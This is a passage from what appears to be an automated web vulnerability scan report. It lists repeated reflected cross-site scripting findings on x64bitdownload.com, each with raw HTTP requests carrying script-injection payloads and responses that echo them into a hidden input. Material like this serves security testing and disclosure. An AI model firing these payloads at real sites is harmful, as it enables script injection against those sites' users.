Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22use-next%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22use+next%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60784


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-use-next-downloads.html5baa0"><script>alert(1)</script>4b3b5d06ac5" />
...[SNIP]...

4.1612. http://www.x64bitdownload.com/64-bit-use-next-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-use-next-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f665d"><script>alert(1)</script>b0fbaf8a5f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-use-next-downloads.html?f665d"><script>alert(1)</script>b0fbaf8a5f3=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:49:20 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:59:21 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22use-next%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22use+next%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60787


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-use-next-downloads.html?f665d"><script>alert(1)</script>b0fbaf8a5f3=1" />
...[SNIP]...

4.1613. http://www.x64bitdownload.com/64-bit-usenet-c-44-newsgroup-clients-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-usenet-c-44-newsgroup-clients-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7902c"><script>alert(1)</script>6aa1bdd3d27 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-usenet-c-44-newsgroup-clients-downloads.html7902c"><script>alert(1)</script>6aa1bdd3d27 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:37:55 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:48:05 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22usenet%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22usenet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37083


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-usenet-c-44-newsgroup-clients-downloads.html7902c"><script>alert(1)</script>6aa1bdd3d27" />
...[SNIP]...

4.1614. http://www.x64bitdownload.com/64-bit-usenet-c-44-newsgroup-clients-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-usenet-c-44-newsgroup-clients-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2042"><script>alert(1)</script>dcfd4e32e26 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-usenet-c-44-newsgroup-clients-downloads.html?d2042"><script>alert(1)</script>dcfd4e32e26=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:25 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:44:40 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22usenet%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22usenet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37086


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-usenet-c-44-newsgroup-clients-downloads.html?d2042"><script>alert(1)</script>dcfd4e32e26=1" />
...[SNIP]...

4.1615. http://www.x64bitdownload.com/64-bit-usenet-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-usenet-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9c53"><script>alert(1)</script>61783017a7a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-usenet-downloads.htmlb9c53"><script>alert(1)</script>61783017a7a HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:49:15 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:59:23 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22usenet%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22usenet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79250


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-usenet-downloads.htmlb9c53"><script>alert(1)</script>61783017a7a" />
...[SNIP]...

4.1616. http://www.x64bitdownload.com/64-bit-usenet-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-usenet-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7053"><script>alert(1)</script>b56ce311832 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-usenet-downloads.html?c7053"><script>alert(1)</script>b56ce311832=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:47:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:57:33 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22usenet%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22usenet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79253


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-usenet-downloads.html?c7053"><script>alert(1)</script>b56ce311832=1" />
...[SNIP]...

4.1617. http://www.x64bitdownload.com/64-bit-usenet-search-engine-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-usenet-search-engine-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88aaf"><script>alert(1)</script>189e1a3160f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-usenet-search-engine-downloads.html88aaf"><script>alert(1)</script>189e1a3160f HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:40:17 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:50:23 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A20%3A%22usenet-search-engine%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A20%3A%22usenet+search+engine%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38622


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-usenet-search-engine-downloads.html88aaf"><script>alert(1)</script>189e1a3160f" />
...[SNIP]...

4.1618. http://www.x64bitdownload.com/64-bit-usenet-search-engine-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-usenet-search-engine-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6caf6"><script>alert(1)</script>8b75e1c033 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-usenet-search-engine-downloads.html?6caf6"><script>alert(1)</script>8b75e1c033=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:36:34 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:46:45 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A20%3A%22usenet-search-engine%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A20%3A%22usenet+search+engine%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38624


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-usenet-search-engine-downloads.html?6caf6"><script>alert(1)</script>8b75e1c033=1" />
...[SNIP]...

4.1619. http://www.x64bitdownload.com/64-bit-usenext-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-usenext-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a316"><script>alert(1)</script>d8cd7fa8591 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-usenext-downloads.html9a316"><script>alert(1)</script>d8cd7fa8591 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:53:02 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:03:44 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22usenext%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22usenext%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28788


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-usenext-downloads.html9a316"><script>alert(1)</script>d8cd7fa8591" />
...[SNIP]...

4.1620. http://www.x64bitdownload.com/64-bit-usenext-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-usenext-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 987b5"><script>alert(1)</script>7e91aeed80a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-usenext-downloads.html?987b5"><script>alert(1)</script>7e91aeed80a=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:48:46 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:58:56 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22usenext%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22usenext%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28791


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-usenext-downloads.html?987b5"><script>alert(1)</script>7e91aeed80a=1" />
...[SNIP]...

4.1621. http://www.x64bitdownload.com/64-bit-video-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-video-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb00e"><script>alert(1)</script>e2b8c71a364 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-video-downloads.htmlcb00e"><script>alert(1)</script>e2b8c71a364 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:47:14 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:57:18 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22video%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22video%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 99716


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-video-downloads.htmlcb00e"><script>alert(1)</script>e2b8c71a364" />
...[SNIP]...

4.1622. http://www.x64bitdownload.com/64-bit-video-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-video-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52103"><script>alert(1)</script>c4132b9c2b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-video-downloads.html?52103"><script>alert(1)</script>c4132b9c2b9=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:42:35 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:52:38 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22video%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22video%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 99719


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-video-downloads.html?52103"><script>alert(1)</script>c4132b9c2b9=1" />
...[SNIP]...

4.1623. http://www.x64bitdownload.com/64-bit-xpat-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-xpat-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5865a"><script>alert(1)</script>73566294139 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-xpat-downloads.html5865a"><script>alert(1)</script>73566294139 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:57:52 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:07:59 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22xpat%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22xpat%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28936


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-xpat-downloads.html5865a"><script>alert(1)</script>73566294139" />
...[SNIP]...

4.1624. http://www.x64bitdownload.com/64-bit-xpat-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-xpat-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fc61"><script>alert(1)</script>c4ecea0b493 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-xpat-downloads.html?6fc61"><script>alert(1)</script>c4ecea0b493=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:54:19 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:04:52 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22xpat%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22xpat%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28939


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-xpat-downloads.html?6fc61"><script>alert(1)</script>c4ecea0b493=1" />
...[SNIP]...

4.1625. http://www.x64bitdownload.com/64-bit-yenc-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-yenc-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b47d8"><script>alert(1)</script>80eaf09c798 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-yenc-downloads.htmlb47d8"><script>alert(1)</script>80eaf09c798 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:44:57 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:55:07 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22yenc%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22yenc%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49292


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-yenc-downloads.htmlb47d8"><script>alert(1)</script>80eaf09c798" />
...[SNIP]...

4.1626. http://www.x64bitdownload.com/64-bit-yenc-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-yenc-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd8dd"><script>alert(1)</script>dc3655acae7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-yenc-downloads.html?bd8dd"><script>alert(1)</script>dc3655acae7=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:41:35 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:51:44 GMT
Cache-Control: max-age=600
Pragma: cache
